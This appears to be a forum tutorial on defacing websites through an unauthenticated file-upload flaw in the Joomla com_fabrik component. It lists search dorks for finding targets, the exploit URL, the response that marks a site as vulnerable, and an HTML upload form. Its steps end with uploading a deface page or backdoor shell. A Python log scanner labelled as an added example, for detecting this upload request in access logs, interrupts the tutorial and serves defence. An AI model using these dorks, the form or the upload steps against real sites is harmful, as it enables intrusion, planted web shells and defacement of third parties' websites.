Okay, this time I'm going to remake the com_fabrik deface tutorial. Why a remake? Because I just found a bug that I turned into a CSRF. Let's get straight into it!
Dork:
- inurl:index.php?option=com_fabrik intext:name
- /index.php?option=com_fabrik site:
- option=com_fabrik&format=raw site:
- com_fabrik site:
- /component/fabrik/ site:
Exploit : index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
Signs of a vulnerable and a non-vulnerable site:
{"error":"Error. Unable to upload file."} = Not vuln
{"filepath":null,"uri":null} = Vuln
1. Pick a dork
2. Enter the exploit
3. Open the CSRF form
<form method="POST" action="http://site.co.il/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data"><input type="file" name="file" /> <button> Upload </button> </form>
(Replace site.co.il with your target site)
4. Upload your deface script/backdoor shell
5. Access site.com/script.htm or site.com/[path]/script.htm
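To spot this request from the server side, the added example below (not part of the original post) scans access-log lines for POSTs to the upload endpoint quoted above and for page or script files the same client fetches afterwards. The combined log format, the file-extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters of the upload request quoted on this page (values lowercased for comparison).
FABRIK_UPLOAD = {"option": "com_fabrik", "task": "plugin.pluginajax",
                 "plugin": "fileupload", "method": "ajax_upload"}
# Assumed combined log format: ip - - [time] "METHOD uri PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SERVED = re.compile(r"\.(html?|php\d?|phtml)$", re.I)  # assumed extensions of interest

def is_fabrik_upload(method, uri):
    """True for a POST whose query matches the upload call, in any parameter order or case."""
    if method.upper() != "POST":
        return False
    query = parse_qs(urlsplit(uri).query)  # parse_qs also percent-decodes values
    return all(v in [x.lower() for x in query.get(k, [])] for k, v in FABRIK_UPLOAD.items())

def scan(lines):
    """Return (hits, follow_ups): upload POSTs, then 200 GETs for page/script files by the same client."""
    uploaders, hits, follow_ups = set(), [], []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that are not in the assumed format
        ip, when, method, uri, status = m.groups()
        if is_fabrik_upload(method, uri):
            uploaders.add(ip)
            hits.append((ip, when, status))
        elif (ip in uploaders and method == "GET" and status == "200"
              and SERVED.search(urlsplit(uri).path)):
            follow_ups.append((ip, when, urlsplit(uri).path))
    return hits, follow_ups

# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE = [
    '198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /index.php?option=com_fabrik&view=form HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:10:02:11 +0000] "POST /index.php?format=raw&option=com_fabrik&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Mar/2024:10:02:40 +0000] "GET /x.htm HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:10:03:00 +0000] "GET /about.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits, follow_ups = scan(SAMPLE)
    for h in hits:
        print("upload attempt:", h)
    for f in follow_ups:
        print("file fetched after upload:", f)
```

A hit only shows that the endpoint was called; whether the upload succeeded depends on the response body, which access logs do not record.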
Don't quite get it? You can leave a comment or chat in the WA group chat.
Thanks
-azay

